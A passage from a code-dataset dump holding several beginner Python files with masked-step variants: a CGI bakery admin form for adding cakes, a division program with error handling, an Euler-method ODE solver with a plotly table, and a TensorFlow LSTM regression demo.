class=\"form-control\">\n <div class=\"h4\">Cake Flavour</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Price\" name=\"price\" class=\"form-control\">\t\n <div class=\"h4\">Cake Image</div>\n\t\t\t\t<input type=\"file\" placeholder=\"Import Your Cake image\" name=\"pic\" class=\"form-control\"><br/>\n <input type=\"submit\" class=\"form-control\" value=\"Add\">\n\t\t\t\t</div>\n\t\t\t\t<div class=\"col-sm-12 footer\">\n\t\t\t\t<div class=\"col-sm-6\">©copyright:<a target=\"_blank\" href=\"https://www.techpile.in\">Techpile Technology.pvt.Ltd.</a>\n\t\t\t\t</div>\n\t\t\t\t\n\t\t\t\t<div class=\"col-sm-6\">\t\n Developed By:-Yash Rastogi</div>\n\t\t\t\t</div>\n\t\t\t\t\n\t\t\t</div>\n\t\t\t</div>\n\n\n</body>\n</html>\n\n\"\"\"\n )\n",
"step-3": "#!C:\\Python27\\python\r\nprint('Content-Type:text/html\\n\\n')\r\nprint (\"\"\"\r\n<html>\r\n<head>\r\n<link href=\"iconTech.png\" rel=\"icon\"/>\r\n<meta name=\"viewport\" content=\"width=device-width,intial-scale=1.0\"/>\r\n<link href=\"../css/bootstrap.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<link href=\"../css/bootstrap-theme.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<link rel=\"stylesheet\" href=\"../css/font-awesome.min.css\" type=\"text/css\"/>\r\n<script src=\"../js/jquery.js\"></script>\r\n<script src=\"../js/bootstrap.min.js\"></script>\r\n<style>\r\n.outer\r\n{\r\nmin-height:100px;\r\n}\r\n.top\r\n{\r\n min-height:50px;\r\n background:gray;\r\n}\r\n.logo\r\n{\r\n height:50px;\r\n width:240px;\r\n margin:5px 5px;\r\n background:white;\r\n font-size:30px;\r\n font-family:Algerian;\r\n border:5px double green;\r\n}\r\n.menu\r\n{\r\n height:50px;\r\n width:1000px;\r\n background:gray;\r\n z-index:10;\r\n}\r\n#menu\r\n{\r\n background:none;\r\n border:none;\r\n box-shadow:none;\r\n padding:1% 0%;\r\n margin:0px;\r\n font-size:15px;\r\n}\r\n#menu ul li a\r\n{\r\n color:white;\r\n text-shadow:none;\r\n font-weight:bold;\r\n font-size:12px;\r\n}\r\n#menu ul li:hover\r\n{\r\n background:transparent; \r\n}\r\n.head\r\n{\r\n height:100px;\r\n background:url('../bimg/d1.jpg');\r\n background-attachment:fixed;\r\n background-size:100% 100%;\r\n}\r\n.head1\r\n{\r\n height:100px;\r\n background-color:rgba(0,0,0,.4);\r\n color:white;\r\n font-size:20px;\r\n padding:2% 0%;\r\n}\r\n.addcake\r\n{\r\nmin-height:550px;\r\nmargin-left:25%;\r\nbackground:rgba(0,0,0,.3);\r\nmargin-top:20px;\r\nmargin-bottom:20px;\r\n}\r\n\r\n.footer\r\n{\r\n min-height:50px;\r\n padding:1% 0%;\r\n text-align:center;\r\n color:white;\r\n font-size:20px;\r\n background:black;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"col-sm-12 outer\">\r\n\t\t\t<div class=\"row\">\r\n\t\t\t\t<div class=\"col-sm-12 top\">\r\n\t\t\t\t<div class=\"row\">\r\n\t\t\t\t\t<div class=\"col-sm-3 logo\">Bake<span style=\"color:orange;\">-o-</span>logy</div>\r\n\t\t\t\t\t<div class=\"col-sm-9 menu\">\t\t\t\t\t<nav class=\"navbar navbar-default\" id=\"menu\">\r\n <div class=\"container-fluid\">\r\n <!-- Brand and toggle get grouped for better mobile display -->\r\n <div class=\"navbar-header\">\r\n <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-example-navbar-collapse-1\" aria-expanded=\"false\">\r\n <span class=\"sr-only clpbtn\">Toggle navigation</span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n </button>\r\n </div>\r\n<!-- Collect the nav links, forms, and other content for toggling -->\r\n <div class=\"collapse navbar-collapse\" id=\"bs-example-navbar-collapse-1\" >\r\n <ul class=\"nav navbar-nav navbar-right\">\r\n <li><a href=\"index.py\">Dashboard</a></li>\r\n <li><a href=\"Addmenu.py\">Add Menu</a></li>\r\n\t\t<li><a href=\"Addservices.py\">Add Services</a></li>\r\n\t\t<li><a href=\"Addimages.py\">Add Images</a></li>\r\n\t\t<li><a href=\"OrderManagement.py\">Order Management</a></li>\r\n\t\t<li><a href=\"ContactManagement.py\">Contact Management</a></li>\r\n\t\t<li><a href=\"Changepassword.py\">Change Password</a></li>\r\n\t\t<li><a href=\"LogOut.py\">LogOut</a></li>\r\n\t\t</li>\r\n \r\n\t\t </ul>\r\n\t\t\t \r\n </div><!-- /.navbar-collapse -->\r\n </div><!-- /.container-fluid -->\r\n</nav>\r\n \t\t\t\t\t\r\n\t\t </div></div></div>\r\n\t\t\t\t<div class=\"col-sm-12 main\">\r\n\t\t\t\t<div class=\"row\">\r\n\t\t\t\t<div class=\"col-sm-12 head\">\r\n\t\t\t\t<div class=\"row\">\r\n\t\t\t\t<div class=\"col-sm-12 head1\">\r\n\t\t\t\t<div class=\"text-center\"><span class=\"fa fa-cutlery \"></span> Add Cake Menu </div>\r\n\t\t\t\t</div>\r\n\t\t\t\t</div></div>\r\n\t\t\t\t</div></div>\r\n\t\t\t\t<div class=\"col-sm-6 addcake\">\r\n\t\t\t\t<div class=\"h2 text-center\">Add Cakes Menu</div>\r\n\t\t\t\t<form action=\"../code/cakecode.py\" enctype=\"multipart/form-data\" method=\"post\">\r\n\t\t\t\t<div class=\"h4\">Cake Name</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Name\" name=\"cake\" class=\"form-control\">\r\n\t\t\t\t<div class=\"h4\">Cake Size</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake size\" name=\"size\" class=\"form-control\">\r\n <div class=\"h4\">Cake Weight</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Flavour\" name=\"flavour\" class=\"form-control\">\r\n <div class=\"h4\">Price</div>\r\n\t\t\t\t <input type=\"text\" placeholder=\"Input Your Cake Weight\" name=\"weight\" class=\"form-control\">\r\n <div class=\"h4\">Cake Flavour</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Price\" name=\"price\" class=\"form-control\">\t\r\n <div class=\"h4\">Cake Image</div>\r\n\t\t\t\t<input type=\"file\" placeholder=\"Import Your Cake image\" name=\"pic\" class=\"form-control\"><br/>\r\n <input type=\"submit\" class=\"form-control\" value=\"Add\">\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class=\"col-sm-12 footer\">\r\n\t\t\t\t<div class=\"col-sm-6\">©copyright:<a target=\"_blank\" href=\"https://www.techpile.in\">Techpile Technology.pvt.Ltd.</a>\r\n\t\t\t\t</div>\r\n\t\t\t\t\r\n\t\t\t\t<div class=\"col-sm-6\">\t\r\n Developed By:-Yash Rastogi</div>\r\n\t\t\t\t</div>\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\r\n\r\n</body>\r\n</html>\r\n\r\n\"\"\")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/local/bin/python
i = 0
while i == 0:
try:
print("Let's divide some numbers!")
a1 = input("Enter numerator: ")
b1 = input("Enter denominator: ")
a = int(a1)
b = int(b1)
print(a1 + " divied by " + b1 + " equals: " + str(a/b))
i += 1
except ZeroDivisionError:
print("Cannot divide by 0")
except ValueError:
print("Invalid input, not a number")
|
normal
|
{
"blob_id": "dcc1b0decf2fca6309dbb60faebd3f0a6944cd7d",
"index": 9130,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile i == 0:\n try:\n print(\"Let's divide some numbers!\")\n a1 = input('Enter numerator: ')\n b1 = input('Enter denominator: ')\n a = int(a1)\n b = int(b1)\n print(a1 + ' divied by ' + b1 + ' equals: ' + str(a / b))\n i += 1\n except ZeroDivisionError:\n print('Cannot divide by 0')\n except ValueError:\n print('Invalid input, not a number')\n",
"step-3": "i = 0\nwhile i == 0:\n try:\n print(\"Let's divide some numbers!\")\n a1 = input('Enter numerator: ')\n b1 = input('Enter denominator: ')\n a = int(a1)\n b = int(b1)\n print(a1 + ' divied by ' + b1 + ' equals: ' + str(a / b))\n i += 1\n except ZeroDivisionError:\n print('Cannot divide by 0')\n except ValueError:\n print('Invalid input, not a number')\n",
"step-4": "#!/usr/local/bin/python\n\ni = 0\nwhile i == 0:\n\n try:\n print(\"Let's divide some numbers!\")\n a1 = input(\"Enter numerator: \")\n b1 = input(\"Enter denominator: \")\n a = int(a1)\n b = int(b1)\n \n print(a1 + \" divied by \" + b1 + \" equals: \" + str(a/b))\n i += 1\n \n except ZeroDivisionError:\n print(\"Cannot divide by 0\")\n except ValueError:\n print(\"Invalid input, not a number\")\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from math import pow
from math import tan
import plotly.figure_factory as ff
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
def euler():
h = 0.1
x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]
y_eval = [0.0]
delta_y = [0.0]
y_real = [0.0]
eps = [0.0]
for i in range(1, len(x)):
y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))
delta_y.append(h * fun(y_eval[i], x[i]))
y_real.append(real_fun(x[i]))
eps.append(abs(y_real[i] - y_eval[i]))
# print in table format
print(y_eval)
print(delta_y)
print(y_real)
print(eps)
data_matrix = [
['k', 'x', 'y', 'delta_y', 'y_real', 'eps']
]
for i in range(0, len(x)):
data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])
table = ff.create_table(data_matrix)
plot(table)
def fun(x, y):
return pow(x + y, 2)
def real_fun(x):
return tan(x) - x
euler()
|
normal
|
{
"blob_id": "20f0480ee7e0782b23ec8ade150cdd8d8ad718bb",
"index": 783,
"step-1": "<mask token>\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\neuler()\n",
"step-4": "from math import pow\nfrom math import tan\nimport plotly.figure_factory as ff\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\neuler()\n",
"step-5": "from math import pow\nfrom math import tan\n\nimport plotly.figure_factory as ff\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n\n # print in table format\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n\n data_matrix = [\n ['k', 'x', 'y', 'delta_y', 'y_real', 'eps']\n ]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\neuler()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
BATCH_START=0
TIME_STEPS=20
BATCH_SIZE=50
INPUT_SIZE=1
OUTPUT_SIZE=1
CELL_SIZE=10
LR=0.006
#generate data
def get_batch():
global BATCH_START,TIME_STEPS
xs=np.arange(BATCH_START,BATCH_START+TIME_STEPS*BATCH_SIZE).reshape((BATCH_SIZE,TIME_STEPS))/(10*np.pi)
seq=np.sin(xs)
res=np.cos(xs)
#data move one
BATCH_START+=TIME_STEPS
# all return shape is (batch_size,time_step,input_size)
return [seq[:,:,np.newaxis],res[:,:,np.newaxis],xs]
#def RNN LSTM Structure
class LSTMRNN(object):
def __init__(self,n_steps,input_size,output_size,cell_size,batch_size):
self.n_steps=n_steps
self.input_size=input_size
self.output_size=output_size
self.cell_size=cell_size
self.batch_size=batch_size
with tf.name_scope('inputs'):
self.xs=tf.placeholder(tf.float32,[None,n_steps,input_size],name='xs')
self.ys=tf.placeholder(tf.float32,[None,n_steps,input_size],name='ys')
with tf.variable_scope('in_hidden'):
self.add_input_layer()
with tf.variable_scope('LSTM_cell'):
self.add_cell()
with tf.variable_scope('out_hidden'):
self.add_output_layer()
with tf.name_scope('cost'):
self.compute_cost()
with tf.name_scope('train'):
self.train_op=tf.train.AdamOptimizer(LR).minimize(self.cost)
#add input layer
def add_input_layer(self):
#shape(batch,step,input)=>(batch*step,input)
l_in_x=tf.reshape(self.xs,[-1,self.input_size],name='2_2D')
Ws_in=self._weight_variable([self.input_size,self.cell_size])
bs_in=self._bias_variable([self.cell_size])
with tf.name_scope('Wx_plus_b'):
l_in_y=tf.matmul(l_in_x,Ws_in)+bs_in
self.l_in_y=tf.reshape(l_in_y,[-1,self.n_steps,self.cell_size],name='2_3D')
#add cell
def add_cell(self):
lstm_cell=tf.contrib.rnn.BasicLSTMCell(self.cell_size,forget_bias=1.0,state_is_tuple=True)
with tf.name_scope('initial_state'):
self.cell_init_state=lstm_cell.zero_state(self.batch_size,dtype=tf.float32)
self.cell_outputs,self.cell_final_state=tf.nn.dynamic_rnn(lstm_cell,self.l_in_y,initial_state=self.cell_init_state,time_major=False)
#add output layer
def add_output_layer(self):
l_out_x=tf.reshape(self.cell_outputs,[-1,self.cell_size],name='2_2D')
Ws_out=self._weight_variable([self.cell_size,self.output_size])
bs_out=self._bias_variable([self.output_size,])
with tf.name_scope('Wx_plus_b'):
self.pred=tf.matmul(l_out_x,Ws_out)+bs_out
def compute_cost(self):
losses=tf.contrib.legacy_seq2seq.sequence_loss_by_example(
[tf.reshape(self.pred,[-1],name='reshape_pred')],
[tf.reshape(self.ys,[-1],name='reshape_target')],
[tf.ones([self.batch_size*self.n_steps],dtype=tf.float32)],
average_across_timesteps=True,
softmax_loss_function=self.ms_error,
name='losses'
)
with tf.name_scope('average_cost'):
self.cost=tf.div(
tf.reduce_sum(losses,name='losses_sum'),
self.batch_size,
name='average_cost'
)
tf.summary.scalar('cost',self.cost)
@staticmethod
def ms_error(labels,logits):
return tf.square(tf.subtract(labels,logits))
def _weight_variable(self,shape,name='weights'):
initializer=tf.random_normal_initializer(mean=0.,stddev=1.,)
return tf.get_variable(shape=shape,initializer=initializer,name=name)
def _bias_variable(self,shape,name='biases'):
initializer=tf.constant_initializer(0.1)
return tf.get_variable(shape=shape,initializer=initializer,name=name)
#train
if __name__=='__main__':
model=LSTMRNN(TIME_STEPS,INPUT_SIZE,OUTPUT_SIZE,CELL_SIZE,BATCH_SIZE)
sess=tf.Session()
#merge for tensorboard
merged=tf.summary.merge_all()
writer=tf.summary.FileWriter("lstmlogs",sess.graph)
sess.run(tf.global_variables_initializer())
#visiable
plt.ion()
plt.show()
#train for 200
for i in range(200):
seq,res,xs=get_batch()
if i==0:
feed_dict={model.xs:seq,model.ys:res,}
else:
feed_dict={model.xs:seq,model.ys:res,model.cell_init_state:state}
#train
_,cost,state,pred=sess.run([model.train_op,model.cost,model.cell_final_state,model.pred],feed_dict=feed_dict)
#plotting
plt.plot(xs[0,:],res[0].flatten(),'r',xs[0,:],pred.flatten()[:TIME_STEPS],'b--')
plt.ylim((-1.2,1.2))
plt.draw()
plt.pause(0.3)
if i%20==0:
# 4
print('cost',round(cost,4))
result=sess.run(merged,feed_dict)
writer.add_summary(result,i)
|
normal
|
{
"blob_id": "e54078f21176bbb7accb4164e7b56633b13cc693",
"index": 8803,
"step-1": "<mask token>\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n <mask token>\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_batch():\n global BATCH_START, TIME_STEPS\n xs = np.arange(BATCH_START, BATCH_START + TIME_STEPS * BATCH_SIZE).reshape(\n (BATCH_SIZE, TIME_STEPS)) / (10 * np.pi)\n seq = np.sin(xs)\n res = np.cos(xs)\n BATCH_START += TIME_STEPS\n return [seq[:, :, np.newaxis], res[:, :, np.newaxis], xs]\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n\n def add_input_layer(self):\n l_in_x = tf.reshape(self.xs, [-1, self.input_size], name='2_2D')\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\n bs_in = self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y = tf.matmul(l_in_x, Ws_in) + bs_in\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size],\n name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\nif __name__ == '__main__':\n model = LSTMRNN(TIME_STEPS, INPUT_SIZE, OUTPUT_SIZE, CELL_SIZE, BATCH_SIZE)\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('lstmlogs', sess.graph)\n sess.run(tf.global_variables_initializer())\n plt.ion()\n plt.show()\n for i in range(200):\n seq, res, xs = get_batch()\n if i == 0:\n feed_dict = {model.xs: seq, model.ys: res}\n else:\n feed_dict = {model.xs: seq, model.ys: res, model.\n cell_init_state: state}\n _, cost, state, pred = sess.run([model.train_op, model.cost, model.\n cell_final_state, model.pred], feed_dict=feed_dict)\n plt.plot(xs[0, :], res[0].flatten(), 'r', xs[0, :], pred.flatten()[\n :TIME_STEPS], 'b--')\n plt.ylim((-1.2, 1.2))\n plt.draw()\n plt.pause(0.3)\n if i % 20 == 0:\n print('cost', round(cost, 4))\n result = sess.run(merged, feed_dict)\n writer.add_summary(result, i)\n",
"step-3": "<mask token>\nBATCH_START = 0\nTIME_STEPS = 20\nBATCH_SIZE = 50\nINPUT_SIZE = 1\nOUTPUT_SIZE = 1\nCELL_SIZE = 10\nLR = 0.006\n\n\ndef get_batch():\n global BATCH_START, TIME_STEPS\n xs = np.arange(BATCH_START, BATCH_START + TIME_STEPS * BATCH_SIZE).reshape(\n (BATCH_SIZE, TIME_STEPS)) / (10 * np.pi)\n seq = np.sin(xs)\n res = np.cos(xs)\n BATCH_START += TIME_STEPS\n return [seq[:, :, np.newaxis], res[:, :, np.newaxis], xs]\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n\n def add_input_layer(self):\n l_in_x = tf.reshape(self.xs, [-1, self.input_size], name='2_2D')\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\n bs_in = self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y = tf.matmul(l_in_x, Ws_in) + bs_in\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size],\n name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\nif __name__ == '__main__':\n model = LSTMRNN(TIME_STEPS, INPUT_SIZE, OUTPUT_SIZE, CELL_SIZE, BATCH_SIZE)\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('lstmlogs', sess.graph)\n sess.run(tf.global_variables_initializer())\n plt.ion()\n plt.show()\n for i in range(200):\n seq, res, xs = get_batch()\n if i == 0:\n feed_dict = {model.xs: seq, model.ys: res}\n else:\n feed_dict = {model.xs: seq, model.ys: res, model.\n cell_init_state: state}\n _, cost, state, pred = 